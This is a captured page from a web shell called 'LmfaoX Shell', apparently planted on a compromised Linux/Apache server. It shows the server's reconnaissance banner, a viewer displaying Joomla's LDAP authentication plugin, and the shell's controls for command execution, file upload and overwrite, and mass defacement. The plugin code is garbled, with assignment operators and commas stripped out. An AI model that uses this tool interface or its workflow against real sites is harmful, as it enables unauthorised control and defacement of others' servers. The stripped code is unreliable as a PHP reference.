ShellBanner
IP Address: 80.252.133.24:443 You: 216.73.216.193
System:Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686
Software:Apache. PHP/5.3.6-13ubuntu3.10
ID:uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
Safe Mode:OFF
Open_Basedir:OFF
Freespace:20.78 GB of 70.42 GB (29.52%)
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,

/ http/ yalagina/ plugins/ authentication/ ldap/ - drwxr-xr-x

Directory:
Viewing file:     ldap.php (3.87 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @copyright    Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license        GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access
defined('_JEXEC') or die;

/**
 * LDAP Authentication Plugin
 *
 * @package        Joomla.Plugin
 * @subpackage    Authentication.ldap
 * @since 1.5
 */

class plgAuthenticationLdap extends JPlugin
{
    /**
     * This method should handle any authentication and report back to the subject
     *
     * @access    public
     * @param   array    $credentials Array holding the user credentials
     * @param    array   $options    Array of extra options
     * @param    object    $response    Authentication response object
     * @return    object    boolean
     * @since 1.5
     */
    function onUserAuthenticate($credentials$options, &$response)
    {
        // Initialise variables.
        $userdetails null;
        $success 0;
        $userdetails = array();

        // For JLog
        $response->type 'LDAP';
        // LDAP does not like Blank passwords (tries to Anon Bind which is bad)
        if (empty($credentials['password']))
        {
            $response->status JAuthentication::STATUS_FAILURE;
            $response->error_message JText::_('JGLOBAL_AUTH_PASS_BLANK');
            return false;
        }

        // load plugin params info
        $ldap_email        $this->params->get('ldap_email');
        $ldap_fullname    $this->params->get('ldap_fullname');
        $ldap_uid        $this->params->get('ldap_uid');
        $auth_method    $this->params->get('auth_method');

        jimport('joomla.client.ldap');
        $ldap = new JLDAP($this->params);

        if (!$ldap->connect())
        {
            $response->status JAuthentication::STATUS_FAILURE;
            $response->error_message JText::_('JGLOBAL_AUTH_NO_CONNECT');
            return;
        }

        switch($auth_method)
        {
            case 'search':
            {
                // Bind using Connect Username/password
                // Force anon bind to mitigate misconfiguration like [#7119]
                if (strlen($this->params->get('username')))
                {
                    $bindtest $ldap->bind();
                }
                else
                {
                    $bindtest $ldap->anonymous_bind();
                }

                if ($bindtest)
                {
                    // Search for users DN
                    $binddata $ldap->simple_search(str_replace("[search]"$credentials['username'], $this->params->get('search_string')));
                    if (isset($binddata[0]) && isset($binddata[0]['dn'])) {
                        // Verify Users Credentials
                        $success $ldap->bind($binddata[0]['dn'], $credentials['password'], 1);
                        // Get users details
                        $userdetails $binddata;
                    } else {
                        $response->status JAuthentication::STATUS_FAILURE;
                        $response->error_message JText::_('JGLOBAL_AUTH_USER_NOT_FOUND');
                    }
                }
                else
                {
                    $response->status JAuthentication::STATUS_FAILURE;
                    $response->error_message JText::_('JGLOBAL_AUTH_NO_BIND');
                }
            }    break;

            case 'bind':
            {
                // We just accept the result here
                $success $ldap->bind($credentials['username'], $credentials['password']);
                if ($success) {
                    $userdetails $ldap->simple_search(str_replace("[search]"$credentials['username'], $this->params->get('search_string')));
                } else {
                    $response->status JAuthentication::STATUS_FAILURE;
                    $response->error_message JText::_('JGLOBAL_AUTH_BIND_FAILED');
                }
            }    break;
        }

        if (!$success)
        {
            $response->status JAuthentication::STATUS_FAILURE;
            if (!strlen($response->error_message)) $response->error_message JText::_('JGLOBAL_AUTH_INCORRECT');
        }
        else
        {
            // Grab some details from LDAP and return them
            if (isset($userdetails[0][$ldap_uid][0])) {
                $response->username $userdetails[0][$ldap_uid][0];
            }

            if (isset($userdetails[0][$ldap_email][0])) {
                $response->email $userdetails[0][$ldap_email][0];
            }

            if (isset($userdetails[0][$ldap_fullname][0])) {
                $response->fullname $userdetails[0][$ldap_fullname][0];
            } else {
                $response->fullname $credentials['username'];
            }

            // Were good - So say so.
            $response->status        JAuthentication::STATUS_SUCCESS;
            $response->error_message '';
        }

        $ldap->close();
    }
}
Command:
Quick Commands:
Upload:
[OK] Max size: 100MB
PHP Filesystem: <@ Ú
Search File:
regexp
Create File:
Overwrite [OK]
View File:
Mass Defacement:
[+] Main Directory: [+] Defacement Url:
LmfaoX Shell - Private Build [BETA] - v0.1 -; Generated: 1.2821 seconds